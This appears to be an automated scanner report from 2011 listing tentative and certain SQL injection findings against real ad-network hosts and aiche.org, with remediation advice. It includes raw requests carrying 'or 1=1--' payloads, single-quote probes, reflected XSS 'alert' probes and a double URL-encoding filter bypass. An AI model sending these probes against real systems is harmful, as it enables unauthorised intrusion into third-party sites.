XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05032011-04

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.

1.1. http://ad.doubleclick.net/adi/N763.no_url_specifiedOX2462/B4639841.8 [name of an arbitrarily supplied request parameter] next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ad.doubleclick.net
Path:	/adi/N763.no_url_specifiedOX2462/B4639841.8

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 83970435%20or%201%3d1--%20 and 83970435%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N763.no_url_specifiedOX2462/B4639841.8;sz=300x250;click=http://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~503597~2587~54012~108044~94417~3~0~0~maysville-online.com~2~8~1~0~2~1~PEiOeaHGRLH4quYZj5mgESimscR103Gq~16~2~gDLdEnJ4dUI3~RiC6i2pCL3Ub~1~0~1~~;ord=1771002466?&183970435%20or%201%3d1--%20=1 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 03 May 2011 15:42:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6107



<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2049738/1-devry_bestOf_300.swf";
var gif = "http://s0.2mdn.net/2049738/1-best_of300.jpg";
var minV = 8;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3afc/f/bf/%2a/c%3B232374964%3B0-0%3B0%3B50145927%3B4307-300/250%3B38381412/38399169/1%3B%3B%7Esscs%3D%3fhttp://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~503597~2587~54012~108044~94417~3~0~0~maysville-online.com~2~8~1~0~2~1~PEiOeaHGRLH4quYZj5mgESimscR103Gq~16~2~gDLdEnJ4dUI3~RiC6i2pCL3Ub~1~0~1~~http%3a%2f%2fwww.devry.edu/degree-programs/colleges-overview.jsp%3Fvc%3D167525");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();

var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3afc/f/bf/%2a/c%3B232374964%3B0-0%3B0%3B50145927%3B4307-300/250%3B38381412/38399169/1%3B%3B%7Esscs%3D%3fhttp://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~503597~2587~54012~108044~94417~3~0~0~maysville-online.com~2~8~1~0~2~1~PEiOeaHGRLH4quYZj5mgESimscR103Gq~16~2~gDLdEnJ4dUI3~RiC6i2pCL3Ub~1~0~1~~http%3a%2f%2fwww.devry.edu/degree-programs/colleges-overview.jsp%3Fvc%3D167525");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTAG";
ctv[0] = "http://www.devry.edu";

var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://ad.doubleclic
...[SNIP]...

Request 2

GET /adi/N763.no_url_specifiedOX2462/B4639841.8;sz=300x250;click=http://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~503597~2587~54012~108044~94417~3~0~0~maysville-online.com~2~8~1~0~2~1~PEiOeaHGRLH4quYZj5mgESimscR103Gq~16~2~gDLdEnJ4dUI3~RiC6i2pCL3Ub~1~0~1~~;ord=1771002466?&183970435%20or%201%3d2--%20=1 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 03 May 2011 15:42:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6068



<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2049738/1-DeVry_Branding_300x250_Std.swf";
var gif = "http://s0.2mdn.net/2049738/1-DeVry_Branding_300x250_Std.jpg";
var minV = 8;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3afc/f/bf/%2a/a%3B232374964%3B1-0%3B0%3B50145927%3B4307-300/250%3B38381379/38399136/1%3B%3B%7Esscs%3D%3fhttp://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~503597~2587~54012~108044~94417~3~0~0~maysville-online.com~2~8~1~0~2~1~PEiOeaHGRLH4quYZj5mgESimscR103Gq~16~2~gDLdEnJ4dUI3~RiC6i2pCL3Ub~1~0~1~~http%3a%2f%2fwww.devry.edu/index.html%3Fvc%3D167525");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();

var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3afc/f/bf/%2a/a%3B232374964%3B1-0%3B0%3B50145927%3B4307-300/250%3B38381379/38399136/1%3B%3B%7Esscs%3D%3fhttp://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~503597~2587~54012~108044~94417~3~0~0~maysville-online.com~2~8~1~0~2~1~PEiOeaHGRLH4quYZj5mgESimscR103Gq~16~2~gDLdEnJ4dUI3~RiC6i2pCL3Ub~1~0~1~~http%3a%2f%2fwww.devry.edu/index.html%3Fvc%3D167525");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "http://www.devry.edu";

var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3afc/f/
...[SNIP]...

1.2. http://ad.doubleclick.net/adi/N763.no_url_specifiedOX2462/B4639841.8 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ad.doubleclick.net
Path:	/adi/N763.no_url_specifiedOX2462/B4639841.8

Issue detail

The sz parameter appears to be vulnerable to SQL injection attacks. The payloads 12387390'%20or%201%3d1--%20 and 12387390'%20or%201%3d2--%20 were each submitted in the sz parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N763.no_url_specifiedOX2462/B4639841.8;sz=300x250;click=http://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~503597~2587~54012~108044~94417~3~0~0~maysville-online.com~2~8~1~0~2~1~PEiOeaHGRLH4quYZj5mgESimscR103Gq~16~2~gDLdEnJ4dUI3~RiC6i2pCL3Ub~1~0~1~~;ord=1771002466?12387390'%20or%201%3d1--%20 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 03 May 2011 15:41:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6068



<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2049738/1-DeVry_Branding_300x250_Std.swf";
var gif = "http://s0.2mdn.net/2049738/1-DeVry_Branding_300x250_Std.jpg";
var minV = 8;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3afc/f/bf/%2a/a%3B232374964%3B1-0%3B0%3B50145927%3B4307-300/250%3B38381379/38399136/1%3B%3B%7Esscs%3D%3fhttp://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~503597~2587~54012~108044~94417~3~0~0~maysville-online.com~2~8~1~0~2~1~PEiOeaHGRLH4quYZj5mgESimscR103Gq~16~2~gDLdEnJ4dUI3~RiC6i2pCL3Ub~1~0~1~~http%3a%2f%2fwww.devry.edu/index.html%3Fvc%3D167525");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();

var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3afc/f/bf/%2a/a%3B232374964%3B1-0%3B0%3B50145927%3B4307-300/250%3B38381379/38399136/1%3B%3B%7Esscs%3D%3fhttp://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~503597~2587~54012~108044~94417~3~0~0~maysville-online.com~2~8~1~0~2~1~PEiOeaHGRLH4quYZj5mgESimscR103Gq~16~2~gDLdEnJ4dUI3~RiC6i2pCL3Ub~1~0~1~~http%3a%2f%2fwww.devry.edu/index.html%3Fvc%3D167525");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "http://www.devry.edu";

var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3afc/f/
...[SNIP]...

Request 2

GET /adi/N763.no_url_specifiedOX2462/B4639841.8;sz=300x250;click=http://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~503597~2587~54012~108044~94417~3~0~0~maysville-online.com~2~8~1~0~2~1~PEiOeaHGRLH4quYZj5mgESimscR103Gq~16~2~gDLdEnJ4dUI3~RiC6i2pCL3Ub~1~0~1~~;ord=1771002466?12387390'%20or%201%3d2--%20 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 03 May 2011 15:41:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6107



<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2049738/1-devry_bestOf_300.swf";
var gif = "http://s0.2mdn.net/2049738/1-best_of300.jpg";
var minV = 8;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3afc/f/bf/%2a/c%3B232374964%3B0-0%3B0%3B50145927%3B4307-300/250%3B38381412/38399169/1%3B%3B%7Esscs%3D%3fhttp://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~503597~2587~54012~108044~94417~3~0~0~maysville-online.com~2~8~1~0~2~1~PEiOeaHGRLH4quYZj5mgESimscR103Gq~16~2~gDLdEnJ4dUI3~RiC6i2pCL3Ub~1~0~1~~http%3a%2f%2fwww.devry.edu/degree-programs/colleges-overview.jsp%3Fvc%3D167525");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();

var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3afc/f/bf/%2a/c%3B232374964%3B0-0%3B0%3B50145927%3B4307-300/250%3B38381412/38399169/1%3B%3B%7Esscs%3D%3fhttp://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~503597~2587~54012~108044~94417~3~0~0~maysville-online.com~2~8~1~0~2~1~PEiOeaHGRLH4quYZj5mgESimscR103Gq~16~2~gDLdEnJ4dUI3~RiC6i2pCL3Ub~1~0~1~~http%3a%2f%2fwww.devry.edu/degree-programs/colleges-overview.jsp%3Fvc%3D167525");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTAG";
ctv[0] = "http://www.devry.edu";

var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://ad.doubleclic
...[SNIP]...

1.3. http://as.casalemedia.com/j [p parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://as.casalemedia.com
Path:	/j

Issue detail

The p parameter appears to be vulnerable to SQL injection attacks. The payloads 14038288'%20or%201%3d1--%20 and 14038288'%20or%201%3d2--%20 were each submitted in the p parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /j?s=121910&u=http%3A%2F%2Fwww.maysville-online.com%2Fcontent%2F%3Fc3a2e%2522-alert(%2522DORK%2522)-%2522f8cf8d87874%3D1&a=4&id=54048766&p=014038288'%20or%201%3d1--%20&v=2&inif=0&l=671&t=402&w=1920&h=1156&z=300&r=http%3A%2F%2Fburp%2Fshow%2F2 HTTP/1.1
Host: as.casalemedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1

Response 1 (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/javascript
Expires: Tue, 03 May 2011 15:41:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 15:41:59 GMT
Content-Length: 482
Connection: close

document.write('<iframe id="cmif4-4136752264" src="http://cdn.optmd.com/blank.html" width="300" height="250" marginwidth="0" marginheight="0" frameborder="0" scrolling="no" allowtransparency="true" onload="var if1 = document.getElementById(\'cmif4-4136752264\'); if (if1.src == \'http://cdn.optmd.com/blank.html\') {if1.src=\'http://ad.doubleclick.net/adi/N5685.126265.1877228746421/B3560676.7;sz=300x250;click0=http://c.casalemedia.com/c/4/1/77336/;ord=0008986600\';}"></iframe>');

Request 2

GET /j?s=121910&u=http%3A%2F%2Fwww.maysville-online.com%2Fcontent%2F%3Fc3a2e%2522-alert(%2522DORK%2522)-%2522f8cf8d87874%3D1&a=4&id=54048766&p=014038288'%20or%201%3d2--%20&v=2&inif=0&l=671&t=402&w=1920&h=1156&z=300&r=http%3A%2F%2Fburp%2Fshow%2F2 HTTP/1.1
Host: as.casalemedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1

Response 2 (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/javascript
Expires: Tue, 03 May 2011 15:41:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 15:41:59 GMT
Content-Length: 469
Connection: close

document.write('<iframe id="cmif4-3550049546" src="http://cdn.optmd.com/blank.html" width="300" height="250" marginwidth="0" marginheight="0" frameborder="0" scrolling="no" allowtransparency="true" onload="var if1 = document.getElementById(\'cmif4-3550049546\'); if (if1.src == \'http://cdn.optmd.com/blank.html\') {if1.src=\'http://ad.doubleclick.net/adi/N4375.Casale/B5142683.29;sz=300x250;click0=http://c.casalemedia.com/c/4/1/85037/;ord=0008986063\';}"></iframe>');

1.4. http://tag.contextweb.com/TagPublish/getad.aspx [tl parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://tag.contextweb.com
Path:	/TagPublish/getad.aspx

Issue detail

The tl parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the tl parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /TagPublish/getad.aspx?01AD=30bJhJdVES12avFPxQG7RVt7LtS_3h86E4ESPmcVEzzZpFtKyX64ldQ&01RI=927EA66A3E77DF3&01NA=na&tagver=1&ca=VIEWAD&cp=503597&ct=94417&cf=300X250&cn=1&rq=1&dw=300&cwu=http%3A%2F%2Fwww.maysville-online.com%2Ffavicon.ico%3Fbe4e4%2522-alert%281%29-%2522ccebc516c28%3D1&mrnd=69691697&if=1&tl=-1'&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250
Cookie: C2W4=CT-1; cw=cw

Response 1

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: CW-APP118
Content-Length: 1183
Date: Tue, 03 May 2011 15:42:02 GMT
Connection: close
Set-Cookie: C2W4=CT-USR; expires=Tue, 31-May-2011 15:42:02 GMT; path=/; domain=.contextweb.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

var strCreative=''
+ '<img src=http://media.contextweb.com/creatives/defaults/300x250.gif height=250 border=0 width=300 alt="There is an error in the ad tag code."><!--ERROR_TAG(id=cw-app118_If00MivX
...[SNIP]...

Request 2

GET /TagPublish/getad.aspx?01AD=30bJhJdVES12avFPxQG7RVt7LtS_3h86E4ESPmcVEzzZpFtKyX64ldQ&01RI=927EA66A3E77DF3&01NA=na&tagver=1&ca=VIEWAD&cp=503597&ct=94417&cf=300X250&cn=1&rq=1&dw=300&cwu=http%3A%2F%2Fwww.maysville-online.com%2Ffavicon.ico%3Fbe4e4%2522-alert%281%29-%2522ccebc516c28%3D1&mrnd=69691697&if=1&tl=-1''&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250
Cookie: C2W4=CT-1; cw=cw

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
CW-Server: CW-WEB29
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2786
Date: Tue, 03 May 2011 15:42:03 GMT
Connection: close
Set-Cookie: C2W4=CT-USR; expires=Tue, 31-May-2011 15:42:02 GMT; path=/; domain=.contextweb.com
Set-Cookie: V=31zUofH1ZIBx; domain=.contextweb.com; expires=Thu, 03-May-2012 15:42:03 GMT; path=/
Set-Cookie: 503597_3_94417=1304437323738; domain=.contextweb.com; path=/
Set-Cookie: vf=1; domain=.contextweb.com; expires=Wed, 04-May-2011 04:00:00 GMT; path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

var strCreative=''
+ '\n'
+ '<script type="text/javascript">\n'
+ '//<![CDATA[\n'
+ 'ord=Math.random()*10000000000000000;\n'
+ 'document.write(\'<script type="text/javasc
...[SNIP]...

1.5. http://tag.contextweb.com/TagPublish/getjs.aspx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /TagPublish%2527/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=503597&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=94417 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250

Response 1

HTTP/1.1 404 Not Found
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: CW-APP118
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 970
Vary: Accept-Encoding
Date: Tue, 03 May 2011 15:41:50 GMT
Connection: close
Set-Cookie: C2W4=CT; expires=Tue, 31-May-2011 15:41:50 GMT; path=/; domain=.contextweb.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html><head><title>GlassFish v3 - Error report</title><style type="text/css"><!--H1 {font-f
...[SNIP]...

Request 2

GET /TagPublish%2527%2527/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=503597&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=94417 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250

Response 2

HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 03 May 2011 15:41:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: C2W4=CT; expires=Tue, 31-May-2011 15:41:50 GMT; path=/; domain=.contextweb.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"
Content-Length: 37

<html><body>Bad Request</body></html>

1.6. http://www.aiche.org/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.aiche.org
Path:	/favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aiche.org
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:42:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
